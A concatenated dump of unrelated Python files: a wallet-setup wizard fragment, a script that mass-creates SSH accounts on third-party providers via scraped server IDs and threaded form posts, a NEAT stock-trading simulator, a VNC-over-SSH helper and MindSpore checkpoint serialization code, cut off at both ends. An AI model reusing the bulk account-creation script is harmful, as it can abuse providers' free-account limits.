choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def choice_and_line_dialog(self, **kwargs): ChoiceLineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def confirm_dialog(self, **kwargs):
WizardConfirmDialog(self, **kwargs).open()
def tos_dialog(self, **kwargs):
WizardTOSDialog(self, **kwargs).open()
def email_dialog(self, **kwargs):
WizardEmailDialog(self, **kwargs).open()
def otp_dialog(self, **kwargs):
if kwargs['otp_secret']:
WizardNewOTPDialog(self, **kwargs).open()
else:
WizardKnownOTPDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_message(self, msg): self.show_error(msg)
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def request_password(self, run_next, force_disable_encrypt_cb=False):
if force_disable_encrypt_cb:
# do not request PIN for watching-only wallets
run_next(None, False)
return
def on_success(old_pin, pin):
assert old_pin is None
run_next(pin, True)
def on_failure():
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
popup = PasswordDialog()
app = App.get_running_app()
popup.init(app, wallet=None, msg=_('Choose PIN code'),
on_success=on_success, on_failure=on_failure, is_change=2)
popup.open()
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
ssh_create.py
|
import os
import re
import time
import json
import requests
import threading
from .app import *
from bs4 import BeautifulSoup
try:
from queue import Queue
except ImportError:
from Queue import Queue
class ssh_create(object):
def __init__(self, verbose=False):
super(ssh_create, self).__init__()
self.hostname_serverid = []
self.data_create_ssh = json.loads(open(real_path('/../database/servers.json')).read())['servers']
self.queue_accounts = Queue()
self.queue_threads = 20
self.accounts = []
self._created = 0
self.verbose = verbose
def log(self, value, status=None):
log(value, status=status)
def log_replace(self, value, log_datetime=False):
log_replace(value, log_datetime=log_datetime)
def log_exception(self, value, status=None):
log_exception(value, status=status)
def get_cookies(self, browser):
return requests.utils.dict_from_cookiejar(browser.cookies)
def created(self):
self._created += 1
def total(self):
return len(self.accounts) - self._created
def create(self, data, account):
serverid = account['serverid']
hostname = account['hostname']
username = account['username'].replace(data['replace-username'], '')
password = account['password'].replace(data['replace-password'], '')
HEAD = 'http://{name}{head}'.format(name=data['name'], head=data['head'].format(serverid=serverid))
POST = 'http://{name}{post}'.format(name=data['name'], post=data['post'])
loop = 0
while True:
try:
if loop >= 1: self.log(results[:-7] + '[R1]' + results[-3:] + '!' if loop == 3 else results)
if loop == 3: break
results = '[Y1]{username_hostname:.<48} '.format(username_hostname=username+'[G1]@'+hostname+' ')
browser = requests.session()
browser.request('HEAD', HEAD, timeout=10)
response = browser.request('POST', POST,
data={'serverid': serverid, 'username': username, 'password': password},
headers={'Referer': POST},
cookies=self.get_cookies(browser),
timeout=15
)
if not response.text:
results = results + '[R1]No response'
loop = loop + 1
continue
elif 'Username already exist' in response.text:
results = results + '[Y1]200'
elif 'has been successfully created' in response.text:
results = results + '[G1]200'
elif 'Account maximum' in response.text:
results = results + '[R1]200'
else:
results = results + '[R1]' + str(response.text)
except requests.exceptions.Timeout:
results = results + '[R1]ERR'
loop = loop + 1
continue
except requests.exceptions.ConnectionError:
results = results + '[R2]ERR'
loop = loop + 1
continue
except Exception as exception:
results = results + '[R1]Exception: ' + str(exception)
self.created()
self.log(results)
self.log_replace('[Y1]{}'.format(self.total()), log_datetime=False)
break
def update_serverid_thread(self, data):
while True:
try:
response = requests.request('GET', 'http://{name}{page}'.format(name=data['name'], page=data['page']), timeout=10)
response = BeautifulSoup(response.text, 'html.parser')
for element in response.find_all(attrs={'class': data['pattern-class']}):
hostname = re.findall(r'{}'.format(data['pattern-hostname'].format(hostname=r'([a-zA-Z0-9]+(\.[a-zA-Z0-9]+)+)')), str(element))
serverid = re.findall(r'{}'.format(data['pattern-serverid'].format(serverid=r'([0-9]+)')), str(element))
hostname = hostname[0][0] if len(hostname) and len(hostname[0]) else ''
serverid = serverid[0] if len(serverid) else ''
if not hostname or not serverid:
hostname_available = False
for account in self.accounts:
if not hostname and hostname == account['hostname']:
hostname_available = True
break
if hostname_available or self.verbose:
self.log('[R1]{hostname:.<48} [R1]{serverid}{verbose}'.format(hostname=(hostname if hostname else '(empty hostname)') + ' [G1]', serverid=(serverid if serverid else '(empty serverid)') + ' ', verbose='[R1](verbose)' if self.verbose else ''))
continue
if self.verbose:
self.log('[G1]{hostname:.<48} [G1]{serverid}'.format(hostname=(hostname if hostname else '(empty hostname)') + ' [G1]', serverid=(serverid if serverid else '(empty serverid)') + ' '))
self.hostname_serverid.append({
'hostname': hostname,
'serverid': serverid
})
except requests.exceptions.Timeout:
self.log('[R1]Connection timeout')
continue
except requests.exceptions.ConnectionError:
self.log('[R1]Connection closed')
except Exception as exception:
self.log_exception(exception)
break
def update_serverid(self):
self.log('Updating serverid')
threads = []
for data in self.data_create_ssh:
name_available = False
for account in self.accounts:
if account['name'] == data['name']:
name_available = True
break
if name_available: threads.append(threading.Thread(target=self.update_serverid_thread, args=(data, )))
for thread in threads:
thread.daemon = True
thread.start()
for thread in threads:
thread.join()
for i in range(len(self.accounts)):
for data in self.hostname_serverid:
hostname = data['hostname']
serverid = data['serverid']
if hostname == self.accounts[i]['hostname']:
self.accounts[i]['serverid'] = serverid
self.hostname_serverid = []
self.log('Updating serverid complete')
def create_thread(self):
while True:
account = self.queue_accounts.get()
for data in self.data_create_ssh:
if data['name'] == account['name']:
self.create(data, account)
break
self.queue_accounts.task_done()
if self.queue_accounts.qsize() == 0: break
def start(self):
if len(self.accounts) >= 1:
message = '[G1]Creating {len_accounts} ssh accounts'.format(len_accounts=len(self.accounts))
self.log(message + ' ' * 8)
self.update_serverid()
for account in self.accounts:
if account.get('serverid'):
self.queue_accounts.put(account)
for i in range(self.queue_threads):
threading.Thread(target=self.create_thread).start()
self.queue_accounts.join()
self.accounts = []
self.log('{message} complete'.format(message=message))
|
neatrader.py
|
import neat
import pandas as pd
from glob import glob
import neatrader.visualize as vis
from neatrader.model import Portfolio, Security
from neatrader.trading import Simulator
from neatrader.daterange import DateRangeFactory
from neatrader.utils import from_small_date
from neatrader.reporter import TradeReporter
from pathlib import Path
from multiprocessing import Process, Manager
TSLA = Security('TSLA')
path = Path('normalized') / TSLA.symbol
training = pd.read_csv(path / 'training.csv', parse_dates=['date'], date_parser=from_small_date)
validation = pd.read_csv(path / 'cross_validation.csv', parse_dates=['date'], date_parser=from_small_date)
training_daterange_factory = DateRangeFactory(training)
cv_daterange_factory = DateRangeFactory(validation)
def worker(mode, simulator, net, start, end, return_dict):
return_dict[mode] = simulator.simulate(net, start, end)
def eval_genomes(genomes, config):
# all genomes should be compared against using the same date range
t_start, t_end = training_daterange_factory.random_date_range(90)
c_start, c_end = cv_daterange_factory.random_date_range(90)
return_dict = Manager().dict()
for genome_id, genome in genomes:
net = neat.nn.FeedForwardNetwork.create(genome, config)
portfolio = Portfolio(cash=0, securities={TSLA: 100})
t_sim = Simulator(TSLA, portfolio, path, training)
c_sim = Simulator(TSLA, portfolio, path, validation)
train_p = Process(target=worker, args=('training', t_sim, net, t_start, t_end, return_dict))
validation_p = Process(target=worker, args=('validation', c_sim, net, c_start, c_end, return_dict))
train_p.start()
validation_p.start()
train_p.join()
validation_p.join()
genome.fitness = return_dict['training']
genome.cv_fitness = return_dict['validation']
def run(config_file):
config = neat.Config(
neat.DefaultGenome,
neat.DefaultReproduction,
neat.DefaultSpeciesSet,
neat.DefaultStagnation,
config_file
)
while True:
checkpoint = sorted(glob('neat-checkpoint-*'), reverse=True)
if checkpoint:
pop = neat.Checkpointer.restore_checkpoint(checkpoint[0])
else:
pop = neat.Population(config)
stats = neat.StatisticsReporter()
# add a stdout reporter to show progress in terminal
pop.add_reporter(neat.StdOutReporter(True))
pop.add_reporter(stats)
pop.add_reporter(neat.Checkpointer(50))
winner = pop.run(eval_genomes, 50)
# display the winning genome
print(f"\nBest genome:\n{winner}")
win_net = neat.nn.FeedForwardNetwork.create(winner, config)
view = False
vis.plot_stats(stats, ylog=False, view=view)
vis.plot_species(stats, view=view)
portfolio = Portfolio(cash=0, securities={TSLA: 100})
simulator = Simulator(TSLA, portfolio, path, training)
daterange = training_daterange_factory.random_date_range(90)
reporter = TradeReporter()
vis.plot_trades(win_net, simulator, daterange, training, path, reporter, view=view)
node_names = {0: 'Buy', 1: 'Sell', 2: 'Hold', 3: 'Delta', 4: 'Theta'}
vis.draw_net(config, winner, view=view, node_names=node_names)
|
vnc-hopper.py
|
#!/usr/bin/env python3
import subprocess
import random
import re
import sys
import os
from threading import Thread
# settings
# jumpserver aliases:
servers = [
'koios1-limba',
'koios2-limba',
]
start_vnc_timeout = 10
# classes:
class VncClientRunner():
def run_vnc_client(self, vnc_server_host, display_id):
# smth like this: vncviewer -via koios1-limba localhost:2
passwd_file = str(local_home) + "/.vnc/passwd"
if os.path.isfile(passwd_file): # if there is password file, let's use it:
command_array = [
'vncviewer', '-via', vnc_server_host, 'localhost:' + str(display_id),
"-passwd="+passwd_file
]
else:
command_array = [
'vncviewer', '-via', vnc_server_host, 'localhost:' + str(display_id)
]
print(str(command_array))
try:
vnc_subprocess = subprocess.Popen(
command_array, # try to run well-known command
stderr=subprocess.PIPE,
stdout=subprocess.PIPE
)
except:
print("Exception in run_vnc_client, let's end this.")
dump_buffer(vnc_subprocess.stdout)
dump_buffer(vnc_subprocess.stderr)
sys.exit(1)
else:
dump_buffer(vnc_subprocess.stdout)
dump_buffer(vnc_subprocess.stderr)
sys.exit(0)
# functions
def dump_buffer(buffer):
lines = buffer.readlines()
for line in lines:
print(str(line.decode('utf-8')).strip())
def start_vnc(server):
# start vnc
try:
start_vnc_output = subprocess.Popen(
['ssh', server, "vncserver","-localhost" ], # try to run vncserver, localhost only.
stderr=subprocess.PIPE,
stdout=subprocess.PIPE
)
dump_buffer(start_vnc_output.stdout)
dump_buffer(start_vnc_output.stderr)
except:
print("Exception in run_vnc_client")
return False
else:
if start_vnc_output.wait(start_vnc_timeout) != 0:
print("Non-zero RC code in start_vnc_output.wait command vncserver...")
return False
if start_vnc_output.returncode != 0:
print("Non-zero RC code for command vncserver...")
return False
# ok, not bad:
return True
def try_ssh(server):
# first check ssh connectivity:
try:
ssh_try_output = subprocess.Popen(
['ssh', server, "uname"], # try to run well-known command
stderr=subprocess.PIPE,
stdout=subprocess.PIPE
)
except:
print("Exception in try_ssh")
return False
else:
uname_string = str(ssh_try_output.stdout.readlines()[0].decode('utf-8')).strip()
if uname_string == 'Linux':
return True
return False
def download_vnc_pass(server):
# first check ssh connectivity:
try:
cmd_string_list = ['scp', "'" + server + ":$HOME/.vnc/passwd'", local_home+"/.vnc/"]
print(cmd_string_list)
ssh_try_output = subprocess.Popen(
cmd_string_list,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE
)
print("download_vnc_pass")
dump_buffer(ssh_try_output.stdout)
dump_buffer(ssh_try_output.stderr)
print("download_vnc_pass_end")
except:
print("Exception in download_vnc_pass")
return False
else:
if ssh_try_output.returncode == 0: return True
return False
def discovery_servers(servers):
# collect info about servers: (buffers)
discovery_outputs = {} # array of buffers
for server in servers:
try:
discovery_output = subprocess.Popen(
["ssh", server, "vncserver", "-list"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE
)
except:
print("Problem occurred when trying to connect to server " + server + ", skipping.")
else:
discovery_outputs[server] = discovery_output
# compile RE to match lines like:
# :3 135784 - 3 is display number, the second number is PID
pattern = re.compile("^:\d+\s+\d+$")
server_list = []
# find running sessions and ports:
for host in discovery_outputs:
lines = discovery_outputs[host].stdout.readlines()
for line in lines:
decoded_line = str(line.decode("utf-8")).strip()
if decoded_line == '': # we skip empty lines
continue
if "TigerVNC" in decoded_line: # we skip title line
continue
if "PROCESS" in decoded_line: # we skip headers
continue
if pattern.match(decoded_line): # parse port and pid
display_id, vnc_pid = decoded_line.split()
display_id = str(display_id).replace(':', '')
server_list.append((str(host), int(display_id), int(vnc_pid)))
if len(server_list) == 0: # no server
return None
else: # return first server: :)
return server_list[0] # take the first one :))
# main
if __name__ == '__main__':
local_home = os.getenv("HOME")
# check if there is any server running, if not, start one:
ds = discovery_servers(servers)
if not ds or ds == 0:
print("There is no running VNC server, let's start one..")
servers_shuffled = random.sample(servers, len(servers))
for server in servers_shuffled:
print("trying ssh to server " + str(server) + "...")
if not try_ssh(server):
continue
print("server with ssh:" + server)
print("starting vnc on server " + str(server) + "...")
if not start_vnc(server):
continue
print("we started vnc server on " + str(server))
break
# now one should be running. if not, then there's something wrong.
ds = discovery_servers(servers)
if not ds or ds == 0:
print("There is no running VNC server and the attempts to start it failed. Contact support.")
sys.exit(1)
host, display_id, pid = discovery_servers(servers)
# download vnc password from server:
#download_vnc_pass(host) #notworking
# let's start vnc client with tunnel:
sshR = VncClientRunner()
ssh_tunnel_thread = Thread(target=sshR.run_vnc_client, args=(host, display_id))
ssh_tunnel_thread.start()
# let's wait for the thread with vncviewer to finish (or to fail..)
ssh_tunnel_thread.join()
|
serialization.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Model and parameters serialization."""
import os
import stat
import math
from threading import Thread, Lock
import numpy as np
import mindspore.nn as nn
from mindspore import log as logger
from mindspore.train.checkpoint_pb2 import Checkpoint
from mindspore.train.print_pb2 import Print
from mindspore.train.node_strategy_pb2 import ParallelStrategyMap
from mindspore.common.tensor import Tensor
from mindspore.common.initializer import initializer
from mindspore.common.parameter import Parameter
from mindspore.common.api import _executor
from mindspore.common import dtype as mstype
from mindspore._checkparam import check_input_data
__all__ = ["save_checkpoint", "load_checkpoint", "load_param_into_net", "export", "parse_print",
"build_searched_strategy", "merge_sliced_parameter"]
tensor_to_ms_type = {"Int8": mstype.int8, "Uint8": mstype.uint8, "Int16": mstype.int16, "Uint16": mstype.uint16,
"Int32": mstype.int32, "Uint32": mstype.uint32, "Int64": mstype.int64, "Uint64": mstype.uint64,
"Float16": mstype.float16, "Float32": mstype.float32, "Float64": mstype.float64,
"Bool": mstype.bool_}
tensor_to_np_type = {"Int8": np.int8, "Uint8": np.uint8, "Int16": np.int16, "Uint16": np.uint16,
"Int32": np.int32, "Uint32": np.uint32, "Int64": np.int64, "Uint64": np.uint64,
"Float16": np.float16, "Float32": np.float32, "Float64": np.float64, "Bool": np.bool_}
_ckpt_mutex = Lock()
SLICE_SIZE = 512 * 1024 * 1024
def _special_process_par(par, new_par):
"""
Processes the special condition.
Like (12,2048,1,1)->(12,2048), this case is caused by GE 4 dimensions tensor.
"""
par_shape_len = len(par.data.shape)
new_par_shape_len = len(new_par.data.shape)
delta_len = new_par_shape_len - par_shape_len
delta_i = 0
for delta_i in range(delta_len):
if new_par.data.shape[par_shape_len + delta_i] != 1:
break
if delta_i == delta_len - 1:
new_val = new_par.data.asnumpy()
new_val = new_val.reshape(par.data.shape)
par.set_data(Tensor(new_val, par.data.dtype))
return True
return False
def _update_param(param, new_param):
"""Updates param's data from new_param's data."""
if isinstance(param.data, Tensor) and isinstance(new_param.data, Tensor):
if param.data.dtype != new_param.data.dtype:
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, param.data.dtype, new_param.data.dtype))
raise RuntimeError(msg)
if param.data.shape != new_param.data.shape:
if not _special_process_par(param, new_param):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) different from parameter_dict's({})"
.format(param.name, param.data.shape, new_param.data.shape))
raise RuntimeError(msg)
return
param.set_data(new_param.data)
return
if isinstance(param.data, Tensor) and not isinstance(new_param.data, Tensor):
if param.data.shape != (1,) and param.data.shape != ():
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) is not (1,), inconsitent with parameter_dict's(scalar)."
.format(param.name, param.data.shape))
raise RuntimeError(msg)
param.set_data(initializer(new_param.data, param.data.shape, param.data.dtype))
elif isinstance(new_param.data, Tensor) and not isinstance(param.data, Tensor):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, type(param.data), type(new_param.data)))
raise RuntimeError(msg)
else:
param.set_data(type(param.data)(new_param.data))
def _exec_save(ckpt_file_name, data_list):
"""Execute save checkpoint into file process."""
try:
with _ckpt_mutex:
if os.path.exists(ckpt_file_name):
os.remove(ckpt_file_name)
with open(ckpt_file_name, "ab") as f:
for name, value in data_list.items():
data_size = value[2].nbytes
if data_size > SLICE_SIZE:
slice_count = math.ceil(data_size / SLICE_SIZE)
param_slice_list = np.array_split(value[2], slice_count)
else:
param_slice_list = [value[2]]
for param_slice in param_slice_list:
checkpoint_list = Checkpoint()
param_value = checkpoint_list.value.add()
param_value.tag = name
param_tensor = param_value.tensor
param_tensor.dims.extend(value[0])
param_tensor.tensor_type = value[1]
param_tensor.tensor_content = param_slice.tostring()
f.write(checkpoint_list.SerializeToString())
os.chmod(ckpt_file_name, stat.S_IRUSR)
except BaseException as e:
logger.error("Failed to save the checkpoint file %s.", ckpt_file_name)
raise e
def save_checkpoint(save_obj, ckpt_file_name, integrated_save=True, async_save=False):
"""
Saves checkpoint info to a specified file.
Args:
save_obj (nn.Cell or list): The cell object or parameters list(each element is a dictionary,
like {"name": param_name, "data": param_data}.)
ckpt_file_name (str): Checkpoint file name. If the file name already exists, it will be overwritten.
integrated_save (bool): Whether to integrated save in automatic model parallel scene.
async_save (bool): Whether asynchronous execution saves the checkpoint to a file. Default: False
Raises:
TypeError: If the parameter save_obj is not nn.Cell or list type.
RuntimeError: Failed to save the Checkpoint file.
"""
if not isinstance(save_obj, nn.Cell) and not isinstance(save_obj, list):
raise TypeError("The parameter save_obj should be nn.Cell or list, but got {}".format(type(save_obj)))
logger.info("Execute save checkpoint process.")
if isinstance(save_obj, nn.Cell):
save_obj.init_parameters_data()
param_dict = {}
for _, param in save_obj.parameters_and_names():
param_dict[param.name] = param
param_list = []
for (key, value) in param_dict.items():
each_param = {"name": key}
if isinstance(value.data, Tensor):
param_data = value.data
else:
param_data = Tensor(value.data)
# in automatic model parallel scenario, some parameters were spliteds to all the devices,
# which should be combined before saving
if integrated_save and key in save_obj.parameter_layout_dict:
param_data = _get_merged_param_data(save_obj, key, param_data)
each_param["data"] = param_data
param_list.append(each_param)
save_obj = param_list
data_list = {}
with _ckpt_mutex:
for param in save_obj:
key = param["name"]
data_list[key] = []
if isinstance(param["data"], Parameter):
param["data"].init_data()
dims = []
if param['data'].shape == ():
dims.append(0)
else:
for dim in param['data'].shape:
dims.append(dim)
data_list[key].append(dims)
tensor_type = str(param["data"].dtype)
data_list[key].append(tensor_type)
data = param["data"].asnumpy().reshape(-1)
data_list[key].append(data)
if async_save:
thr = Thread(target=_exec_save, args=(ckpt_file_name, data_list), name="asyn_save_ckpt")
thr.start()
else:
_exec_save(ckpt_file_name, data_list)
logger.info("Save checkpoint process finish.")
def load_checkpoint(ckpt_file_name, net=None):
"""
Loads checkpoint info from a specified file.
Args:
ckpt_file_name (str): Checkpoint file name.
net (Cell): Cell network. Default: None
Returns:
Dict, key is parameter name, value is a Parameter.
Raises:
ValueError: Checkpoint file is incorrect.
"""
if not isinstance(ckpt_file_name, str):
raise ValueError("The ckpt_file_name must be string.")
if not os.path.exists(ckpt_file_name):
raise ValueError("The checkpoint file is not exist.")
if ckpt_file_name[-5:] != ".ckpt":
raise ValueError("Please input the correct checkpoint file name.")
if os.path.getsize(ckpt_file_name) == 0:
raise ValueError("The checkpoint file may be empty, please make sure enter the correct file name.")
logger.info("Execute load checkpoint process.")
checkpoint_list = Checkpoint()
try:
with open(ckpt_file_name, "rb") as f:
pb_content = f.read()
checkpoint_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the checkpoint file `%s`, please check the correct of the file.", ckpt_file_name)
raise ValueError(e.__str__())
parameter_dict = {}
try:
element_id = 0
param_data_list = []
for element in checkpoint_list.value:
data = element.tensor.tensor_content
data_type = element.tensor.tensor_type
np_type = tensor_to_np_type[data_type]
ms_type = tensor_to_ms_type[data_type]
element_data = np.frombuffer(data, np_type)
param_data_list.append(element_data)
if (element_id == len(checkpoint_list.value) - 1) or \
(element.tag != checkpoint_list.value[element_id + 1].tag):
param_data = np.concatenate((param_data_list), axis=0)
param_data_list.clear()
dims = element.tensor.dims
if dims == [0]:
if 'Float' in data_type:
param_data = float(param_data[0])
elif 'Int' in data_type:
param_data = int(param_data[0])
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
elif dims == [1]:
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
else:
param_dim = []
for dim in dims:
param_dim.append(dim)
param_value = param_data.reshape(param_dim)
parameter_dict[element.tag] = Parameter(Tensor(param_value, ms_type), name=element.tag)
element_id += 1
logger.info("Load checkpoint process finish.")
except BaseException as e:
logger.error("Failed to load the checkpoint file `%s`.", ckpt_file_name)
raise RuntimeError(e.__str__())
if net is not None:
load_param_into_net(net, parameter_dict)
return parameter_dict
def load_param_into_net(net, parameter_dict):
"""
Loads parameters into network.
Args:
net (Cell): Cell network.
parameter_dict (dict): Parameter dictionary.
Raises:
TypeError: Argument is not a Cell, or parameter_dict is not a Parameter dictionary.
"""
if not isinstance(net, nn.Cell):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument net should be a Cell, but got {}.".format(type(net)))
raise TypeError(msg)
if not isinstance(parameter_dict, dict):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict should be a dict, but got {}.".format(type(parameter_dict)))
raise TypeError(msg)
logger.info("Execute load parameter into net process.")
net.init_parameters_data()
param_not_load = []
for _, param in net.parameters_and_names():
if param.name in parameter_dict:
new_param = parameter_dict[param.name]
if not isinstance(new_param, Parameter):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict element should be a Parameter, but got {}.".format(type(new_param)))
raise TypeError(msg)
_update_param(param, new_param)
else:
param_not_load.append(param.name)
if param_not_load:
_load_dismatch_prefix_params(net, parameter_dict, param_not_load)
logger.debug("Params not matched(in net but not in parameter_dict):")
for param_name in param_not_load:
logger.debug("%s", param_name)
logger.info("Load parameter into net finish, {} parameters has not been loaded.".format(len(param_not_load)))
return param_not_load
def _load_dismatch_prefix_params(net, parameter_dict, param_not_load):
"""When some net parameter did not load, try to continue load."""
prefix_name = ""
longest_name = param_not_load[0]
while prefix_name != longest_name and param_not_load:
logger.debug("Count: {} parameters has not been loaded, try to load continue.".format(len(param_not_load)))
prefix_name = longest_name
for net_param_name in param_not_load:
for dict_name in parameter_dict:
if dict_name.endswith(net_param_name):
prefix_name = dict_name[:-len(net_param_name)]
break
if prefix_name != longest_name:
break
if prefix_name != longest_name:
logger.warning("Remove parameter prefix name: {}, continue to load.".format(prefix_name))
for _, param in net.parameters_and_names():
new_param_name = prefix_name + param.name
if param.name in param_not_load and new_param_name in parameter_dict:
new_param = parameter_dict[new_param_name]
_update_param(param, new_param)
param_not_load.remove(param.name)
def _save_graph(network, file_name):
"""
Saves the graph of network to a file.
Args:
network (Cell): Obtain a pipeline through network for saving graph.
file_name (str): Graph file name into which the graph will be saved.
"""
logger.info("Execute save the graph process.")
graph_proto = network.get_func_graph_proto()
if graph_proto:
with open(file_name, "wb") as f:
f.write(graph_proto)
os.chmod(file_name, stat.S_IRUSR)
def _get_merged_param_data(net, param_name, param_data):
"""
Gets the merged data(tensor) from tensor slice, by device arrangement and tensor map.
Args:
net (Cell): MindSpore network.
param_name(str): The parameter name, which to be combined.
param_data(Tensor):The parameter data on the local device,
It was a slice of the whole parameter data.
Returns:
Tensor, the combined tensor which with the whole data value.
"""
layout = net.parameter_layout_dict[param_name]
if len(layout) < 5:
logger.info("layout dict does not contain the key %s", param_name)
return param_data
dev_mat = layout[0]
tensor_map = layout[1]
field_size = layout[3]
uniform_split = layout[4]
if uniform_split[0] == 0:
raise RuntimeError("Save checkpoint only support uniform split tensor now.")
from mindspore.parallel._cell_wrapper import get_allgather_cell
from mindspore.parallel._tensor import _reshape_param_data, _reshape_param_data_with_weight
# while any dim is not equal to -1, means param is splited and needs to be merged
for dim in tensor_map:
if dim != -1:
allgather_net = get_allgather_cell()
param_data = allgather_net(param_data)
if field_size[0]:
return _reshape_param_data_with_weight(param_data, dev_mat, field_size)
return _reshape_param_data(param_data, dev_mat, tensor_map)
return param_data
def _fill_param_into_net(net, parameter_list):
"""
Fills parameter_list into net.
Args:
net (Cell): train network.
parameter_list (list): parameters list from ge callback.
"""
parameter_dict = {}
for each_param in parameter_list:
param_name = each_param["name"]
if isinstance(each_param["data"], Parameter):
each_param["data"].init_data()
np_val = each_param["data"].asnumpy()
if np_val.shape == (1,):
parameter_dict[param_name] = Parameter(np_val, name=param_name)
elif np_val.shape == ():
parameter_dict[param_name] = Parameter(Tensor(np_val.tolist(), mstype.pytype_to_dtype(np_val.dtype)),
name=param_name)
else:
parameter_dict[param_name] = Parameter(Tensor(np_val), name=param_name)
load_param_into_net(net, parameter_dict)
def export(net, *inputs, file_name, file_format='AIR'):
"""
Export the MindSpore prediction model to a file in the specified format.
Args:
net (Cell): MindSpore network.
inputs (Tensor): Inputs of the `net`.
file_name (str): File name of the model to be exported.
file_format (str): MindSpore currently supports 'AIR', 'ONNX' and 'MINDIR' format for exported model.
- AIR: Ascend Intermidiate Representation. An intermidiate representation format of Ascend model.
Recommended suffix for output file is '.air'.
- ONNX: Open Neural Network eXchange. An open format built to represent machine learning models.
Recommended suffix for output file is '.onnx'.
- MINDIR: MindSpore Native Intermidiate Representation for Anf. An intermidiate representation format
for MindSpore models.
Recommended suffix for output file is '.mindir'.
"""
logger.info("exporting model file:%s format:%s.", file_name, file_format)
check_input_data(*inputs, data_class=Tensor)
if file_format == 'GEIR':
logger.warning(f"Format 'GEIR' is deprecated, it would be removed in future release, use 'AIR' instead.")
file_format = 'AIR'
supported_formats = ['AIR', 'ONNX', 'MINDIR']
if file_format not in supported_formats:
raise ValueError(f'Illegal file format {file_format}, it must be one of {supported_formats}')
# When dumping ONNX file, switch network mode to infer when it is training(NOTE: ONNX only designed for prediction)
is_dump_onnx_in_training = net.training and file_format == 'ONNX'
if is_dump_onnx_in_training:
net.set_train(mode=False)
# export model
net.init_parameters_data()
if file_format == 'AIR':
phase_name = 'export.air'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name)
_executor.export(file_name, graph_id)
elif file_format == 'ONNX': # file_format is 'ONNX'
phase_name = 'export.onnx'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(graph_id)
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IWUSR | stat.S_IRUSR)
f.write(onnx_stream)
elif file_format == 'MINDIR': # file_format is 'MINDIR'
phase_name = 'export.mindir'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(graph_id, 'mind_ir')
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IWUSR | stat.S_IRUSR)
f.write(onnx_stream)
# restore network training mode
if is_dump_onnx_in_training:
net.set_train(mode=True)
def parse_print(print_file_name):
"""
Loads Print data from a specified file.
Args:
print_file_name (str): The file name of saved print data.
Returns:
List, element of list is Tensor.
Raises:
ValueError: The print file may be empty, please make sure enter the correct file name.
"""
print_file_path = os.path.realpath(print_file_name)
if os.path.getsize(print_file_path) == 0:
raise ValueError("The print file may be empty, please make sure enter the correct file name.")
logger.info("Execute load print process.")
print_list = Print()
try:
with open(print_file_path, "rb") as f:
pb_content = f.read()
print_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the print file %s, please check the correct of the file.", print_file_name)
raise ValueError(e.__str__())
tensor_list = []
try:
for print_ in print_list.value:
# String type
if print_.HasField("desc"):
tensor_list.append(print_.desc)
elif print_.HasField("tensor"):
dims = print_.tensor.dims
data_type = print_.tensor.tensor_type
data = print_.tensor.tensor_content
np_type = tensor_to_np_type[data_type]
param_data = np.fromstring(data, np_type)
ms_type = tensor_to_ms_type[data_type]
param_dim = []
for dim in dims:
param_dim.append(dim)
if param_dim:
param_value = param_data.reshape(param_dim)
tensor_list.append(Tensor(param_value, ms_type))
# Scale type
else:
data_type_ = data_type.lower()
if 'float' in data_type_:
param_data = float(param_data[0])
elif 'int' in data_type_:
param_data = int(param_data[0])
elif 'bool' in data_type_:
param_data = bool(param_data[0])
tensor_list.append(Tensor(param_data, ms_type))
except BaseException as e:
